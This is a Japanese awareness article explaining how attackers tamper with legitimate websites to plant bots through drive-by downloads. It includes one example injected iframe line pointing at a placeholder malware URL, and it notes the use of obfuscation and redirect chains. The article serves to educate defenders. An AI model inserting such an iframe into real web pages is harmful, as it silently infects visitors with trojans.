トピックス記事     カテゴリ : セキュリティ

不正なサイトは、「正常サイト + 1行」

攻撃者は、インターネットに接続されているパソコンに、ボットを侵入させてゾンビパソコンを作る。

ボットを侵入させるためにの手口は3つある。
  • ボットをインストールするプログラムに添付ファイルした電子メールを送りつける。
  • ボットを侵入させるURLを書いた電子メールを送りつける。
  • 正規のサイトに潜り込み、ボットをインストールするURLを付け加える
黒幕は、最初に正規のサイトを改ざんするためには、書き換えできるwebサイトを探す。
「書き換えできる = 侵入できる」サイトが見つかれば、改ざんはあっという間である。
その手順は...
そのページに、マルウェアをダウンロードさせるURLを書き込む。
これだけである。
書き込むコードは1行か2行ととてもシンプルだ。
書き加えるコードの例
<iframesrc="http://○○○○.comt/sample/mlware.php"></iframe>
       ※ 最近は簡単に読まれないように、難読化されたコードが増えている。

ブラウザや windowsにセキュリティホールがあれば、ページを表示しただけで、http://○○○○.com/sample /mlware.phpから自動的にトロイの木馬をインストールする仕組みだ。
侵入したトロイの木馬は、隠れてさらにボットやスパイウェアを呼び込む。

このような危ないリンクが書かれていても、見た目は安全なサイトとまったく変わらない。
価格コムの事件で書き込まれたコードも、正常なサイトに1行追加されただけだった。
ソースコードを見なければサイトの持ち主でも、書き換えられたことに気づかないだろう。ましてサイトを訪れた人には改ざんはわからない。

いろいろな報告をみると、侵入パターンの多くは、
  • リンク先のURLをJavascriptで難読化し
  • そのリンクに、またリンクがあり
  • さらにそのリンクの先に、またリンクを置く
のように、いくつかのサイトを渡り歩いてからダウンロードさせる最終のページに行き着くケースが多いようだ。
もちろんブラウザは、正規サイトを改ざんしたページから、マルウェアの実態を置いたページまでは瞬時に進んで、気づかれないうちに「トロイの木馬」をパソコンに読み込む。

Comments

Add Comment

このアイテムは閲覧専用です。コメントの投稿、投票はできません。
 
Copyright | 8 Peaks Inc. | Saku City NAGANO | 0267-82-7082 | Back to top